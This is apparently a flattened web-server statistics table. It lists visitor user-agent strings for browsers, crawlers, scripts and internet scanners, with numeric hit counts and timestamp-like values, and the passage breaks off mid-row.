(Linux; Android 9; EML-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 4 1 0 0 0 28784074 0 0 28784074 0 0 2321 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 4 1 0 0 0 28780398 0 0 28780398 0 0 2321 BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0) 4 1 0 0 0 28687824 0 0 28687824 0 0 362 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3542.0 Safari/537.36 4 1 0 0 0 29324036 0 0 29324036 0 0 2321 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 4 3 3 0 3 28774146 0 28774146 28598316 0 28598316 1836 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 4 1 1 0 0 28687824 0 0 28687824 0 0 612 Mozilla/5.0 (Linux; Android 7.0; ASUS_X00GD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 5 0 0 29361307 0 0 29353653 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29392136 0 0 29392136 0 Python-urllib/3.10 4 1 0 0 0 29362906 0 0 29362906 0 0 362 Mozilla/5.0 (X11; CrOS aarch64 12239.67.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.102 Safari/537.36 4 1 1 0 0 29263273 0 0 29263273 0 0 0 Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 4 0 0 0 1 0 0 29403111 0 0 29403111 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 4 1 1 0 51 29313789 0 29313965 29313789 0 28604394 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 4 3 3 0 1 29125604 0 29394334 29125507 0 29394334 1536 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 4 4 4 0 0 28951171 0 0 28774716 0 0 2135 Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 4 0 0 0 5 0 0 29351087 0 0 29351087 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28693820 0 0 28693820 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.141 YaBrowser/22.3.3.852 Yowser/2.5 Safari/537.36 4 1 0 0 0 28795203 0 0 28795203 0 0 362 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 4 1 1 0 0 29154643 0 0 29154643 0 0 512 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62 4 0 0 0 1 0 0 29060915 0 0 29060915 0 python-requests/2.22.0 4 36 36 0 39 29320094 0 28835126 28714513 0 28714513 21758 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29129246 0 0 29129246 0 Mozilla/5.0 (Macintosh Intel Mac OS X 10.15 rv:91.0) Gecko/20100101 Firefox/91.0; 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 4 11 5 0 98 29416373 0 29416373 28917138 0 29335324 9987 python-httpx/0.28.1 4 1 0 0 0 28632604 0 0 28632604 0 0 362 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 4 3 3 0 2 29389191 0 29306782 29218610 0 29218616 3245 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 4 1 1 0 33 29389153 0 29389153 29389153 0 29389153 314 Mozilla/5.0 (l9scan/2.0.238313e29393e26343e28373; +https://leakix.net) 4 1 0 0 0 28780399 0 0 28780399 0 0 2321 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72 4 0 0 0 1 0 0 29021745 0 0 29021745 0 Mozilla/5.0 (Linux; Android 7.0; LG-H918 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 4 0 0 1 0 0 28695432 0 0 28695432 0 0 Mozilla/5.0 (iPad; CPU OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1 4 14 14 0 0 28774716 0 0 28598332 0 0 4256 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 4 1 1 0 0 29015490 0 0 29015490 0 0 509 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1 20.51 4 0 0 0 1 0 0 28660294 0 0 28660294 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36 4 2 2 0 0 28696980 0 0 28696980 0 0 1224 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/534.1 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G990E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/17.0 Chrome/96.0.4664.104 Mobile Safari/537.36 4 1 1 0 0 29304734 0 0 29304734 0 0 682 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 4 0 0 0 1 0 0 28781237 0 0 28781237 0 Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10 4 7 7 0 11 29157909 0 29157909 29104517 0 29104517 3578 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 4 0 0 0 2 0 0 28770880 0 0 28770880 0 WinHTTP Example/1.0 4 5 1 0 0 28600601 0 0 28600601 0 0 4985 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/124.0.6367.155 Safari/537.36 4 1 1 0 0 29104241 0 0 29104241 0 0 512 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 4 2 2 0 0 29352526 0 0 29152602 0 0 1194 Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 4 2 2 0 13 29053026 0 29383844 29039207 0 28940400 2070 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36 4 77 77 1 61 29403002 29403002 29403002 28600321 29403002 28600321 44042 Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) 4 0 0 0 1 0 0 28811874 0 0 28811874 0 Mozilla/5.0 (Linux; Android 9; Redmi Note 5 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 4 1 0 0 0 28632604 0 0 28632604 0 0 2321 Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240 4 1 1 0 0 29265860 0 0 29265860 0 0 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 4 1 1 0 0 29199663 0 0 29199663 0 0 609 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28619043 0 0 28619043 0 ArcMobile2/1.14.1 (iPhone; iOS 17.4.1; Scale/3.00) 4 1 0 0 0 28776330 0 0 28776330 0 0 362 Peach/1.01 (Ubuntu 8.04 LTS; U; en) 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57 4 30 26 0 239 29389153 0 29396615 28598316 0 28598316 26772 Go-http-client/1.1 4 0 0 0 3 0 0 29267936 0 0 29226377 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A 4 10 2 0 2 28598320 0 28598320 28598320 0 28598320 9148 Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/99.0.4844.47 Mobile/15E148 Safari/604.1 4 2 2 0 0 29030112 0 0 29030112 0 0 512 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 4 1 0 0 0 28780399 0 0 28780399 0 0 2321 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3875.0 Safari/537.36 4 2 2 0 0 28598326 0 0 28598325 0 0 1224 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/52b2551 warc/v0.8.38 4 1 1 0 0 29320578 0 0 29320578 0 0 682 curl/7.4.0 4 1 0 0 0 29314257 0 0 29314257 0 0 2321 Mozilla/5.0 (compatible; alexa site audit/1.0; +http://www.alexa.com/help/webmasters; ) 4 1 1 0 0 28784459 0 0 28784459 0 0 612 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0) 4 14 6 0 7 28598539 0 29369158 28598351 0 28598351 14188 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 4 13 3 0 0 29301185 0 0 28861870 0 0 14013 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36 4 1 1 0 0 28632603 0 0 28632603 0 0 612 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0 4 0 0 0 1 0 0 28692779 0 0 28692779 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Avast/122.0.0.0 4 0 0 0 1 0 0 29100022 0 0 29100022 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 4 5 5 0 7 29147543 0 29147543 29117808 0 29117808 2557 Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 4 0 0 0 1 0 0 29229312 0 0 29229312 0 Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 4 1 0 0 0 28760125 0 0 28760125 0 0 362 Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Safari/605.1.15 Epiphany/605.1.15 4 1 1 0 0 28598318 0 0 28598318 0 0 612 Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 4 10 10 0 2 29363470 0 29348745 29220501 0 29238407 13110 Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity 4 8 8 0 8 29407122 0 29407122 29265176 0 29265176 4574 Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0 4 2 2 0 0 29273718 0 0 29273718 0 0 609 Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/121.0.2277.107 Version/17.0 Mobile/15E148 Safari/604.1 4 7 1 0 0 28873380 0 0 28777010 0 0 8657 python-httpx/0.27.2 4 8 8 0 0 29344311 0 0 29208764 0 0 5091 Mozilla/5.0 zgrab/0.x 4 1 0 0 0 29314257 0 0 29314257 0 0 362 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 4 0 0 0 3 0 0 29093617 0 0 29093617 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 4 15 3 0 0 28773964 0 0 28598316 0 0 14955 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36 4 1 1 0 0 29352188 0 0 29352188 0 0 682 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 4 1 0 0 0 28687204 0 0 28687204 0 0 362 Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:2.0b4) Gecko/20100818 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.136 Safari/537.36 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 4 2 2 0 0 28686125 0 0 28686124 0 0 1224 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/ae4878c warc/v0.8.39 4 2 2 0 0 29273719 0 0 29273719 0 0 1257 Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko 4 1 0 0 0 28795203 0 0 28795203 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 4 9 3 0 7 28904006 0 28904006 28780353 0 28780353 9013 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 4 1 0 0 0 29303996 0 0 29303996 0 0 2321 Mozilla/5.0 (Linux; Android 8.0.0; moto e5 plus Build/OPPS27.91-122-3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36 4 12 5 0 0 29296471 0 0 29035054 0 0 12171 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 4 2 2 0 0 28780700 0 0 28780700 0 0 1224 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/08ba828 warc/v0.8.48 4 0 0 0 7 0 0 29213478 0 0 29213354 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 4 28 6 0 0 29301500 0 0 28600010 0 0 28968 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 4 1 1 0 0 28599414 0 0 28599414 0 0 612 Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b2) Gecko/20050702 4 1 0 0 0 28687825 0 0 28687825 0 0 2321 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.25 Safari/537.36 4 0 0 0 14 0 0 29269510 0 0 28975315 0 Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection) 4 22 22 0 0 28642426 0 0 28598433 0 0 13460 Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0 4 3 3 0 2 29074781 0 29235620 28951504 0 29235620 1024 python-requests/2.27.1 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/archive.org_bot) 4 12 12 0 0 29301184 0 0 28598316 0 0 14339 Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3 4 1 1 0 0 29320578 0 0 29320578 0 0 682 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 4 1 1 0 1 29224259 0 29224258 29224259 0 29224258 609 Mozilla/5.0 (compatible; ScannerBot/1.0; +https://example.com/bot) 4 1 0 0 0 28606744 0 0 28606744 0 0 2321 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174 4 1 1 0 0 29363349 0 0 29363349 0 0 682 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 4 1 0 0 0 28687825 0 0 28687825 0 0 2321 Mozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 4 1 0 0 0 28907956 0 0 28907956 0 0 2321 SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 4 1 1 0 0 28774999 0 0 28774999 0 0 612 Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.9) Gecko/2009040821 4 25 25 0 0 28899465 0 0 28607001 0 0 30865 Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; Android 12; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; Android 10; VOG-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.79 Mobile Safari/537.36 4 1 0 0 0 28703414 0 0 28703414 0 0 362 wii libnup/1.0 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 4 1 0 0 0 28784459 0 0 28784459 0 0 2321 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 (Edition Campaign 34) 4 2 2 0 0 29273719 0 0 29273719 0 0 1257 Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko 4 1 1 0 0 29046057 0 0 29046057 0 0 512 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 4 0 0 0 3 0 0 29370693 0 0 29360066 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; robots.txt; +https://openai.com/searchbot 4 1 0 0 0 28774464 0 0 28774464 0 0 362 Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11 4 0 0 0 1 0 0 29157451 0 0 29157451 0 Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1 4 8 8 0 8 29273719 0 29273719 29273719 0 29273719 4882 Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4a) Gecko/20030401 4 3 3 0 0 29268923 0 0 29122502 0 0 1630 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0 4 0 0 0 1 0 0 28697877 0 0 28697877 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 4 1 0 0 0 28606744 0 0 28606744 0 0 362 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 4 1 0 0 0 28687824 0 0 28687824 0 0 2321 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 4 2 2 0 63 29289142 0 29289142 29289142 0 29289142 1218 Mozilla/5.0 (compatible; MSIE 7.0; Linux i386; Trident/4.0; X11) 4 1 1 0 0 28690191 0 0 28690191 0 0 612 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36 4 0 0 0 2 0 0 29355640 0 0 29355640 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 4 10 10 0 0 29371099 0 0 29073269 0 0 6261 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 4 1 1 0 1 29314499 0 29372452 29314499 0 29372452 682 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 4 5 1 0 1 28598479 0 28598479 28598479 0 28598479 4574 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0 4 1 0 0 0 29318915 0 0 29318915 0 0 1284 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0 4 4 1 0 1 29099990 0 29099990 29099990 0 29099990 4476 googlebot 4 20 0 0 0 29389149 0 0 28598314 0 0 1280 Cpanel-HTTP-Client/1.0 4 1 1 0 0 29122595 0 0 29122595 0 0 512 Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 4 0 0 0 1 0 0 29020685 0 0 29020685 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 4 6 6 0 0 28804019 0 0 28776238 0 0 7569 curl/7.61.1 4 1 1 0 0 29366949 0 0 29366949 0 0 1365 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28702727 0 0 28702727 0 Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 4 1 1 0 0 29037521 0 0 29037521 0 0 512 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/160d17a warc/v0.8.73 4 1 1 0 1 28901921 0 28901921 28901921 0 28901921 509 Mozilla/5.0 (compatible; wpbot/1.2; +https://forms.gle/ajBaxygz9jSR8p8G9) 4 0 0 0 1 0 0 29364855 0 0 29364855 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 4 11 5 0 8 28879070 0 28879070 28698505 0 28698505 10318 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36 4 62 42 3 52 29250913 29250911 29250913 29250910 29250910 29250910 351476 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) 4 1 1 0 0 28795203 0 0 28795203 0 0 612 Mozilla/5.0 (Linux; Android 7.0; i1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 4 1 0 0 0 28686603 0 0 28686603 0 0 2321 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 4 1 0 0 0 28687204 0 0 28687204 0 0 2321 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 4 3 3 0 0 28989273 0 0 28940400 0 0 0 curl/7.88.1 4 0 0 0 1 0 0 28779945 0 0 28779945 0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36 OPR/20.0.1387.91 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; Android 11; Pixel 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 4 0 0 0 1 0 0 28720488 0 0 28720488 0 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 4 1 0 0 0 28686603 0 0 28686603 0 0 362 Mozilla/5.0 (X11; ; Linux i686; rv:1.9.2.20) Gecko/20110805 4 13 13 0 15 28896996 0 28896996 28842321 0 28842321 6647 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28780367 0 0 28780367 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 4 1 1 0 0 28686603 0 0 28686603 0 0 612 Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393 4 1 1 0 0 28703413 0 0 28703413 0 0 612 Mozilla/5.0 (Linux; Android 9; SM-M305F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 4 1 0 0 0 28784460 0 0 28784460 0 0 362 SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 4 0 0 0 8 0 0 29382618 0 0 28605909 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 4 1 0 0 0 28784459 0 0 28784459 0 0 362 Mozilla/5.0 (Windows NT 5.1; rv:38.0) Gecko/20100101 Firefox/38.0 SeaMonkey/2.35 4 1 1 0 3 29299572 0 29369153 29299572 0 29369153 682 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 4 0 0 0 1 0 0 28775301 0 0 28775301 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2859.0 Safari/537.36 4 1 1 0 17 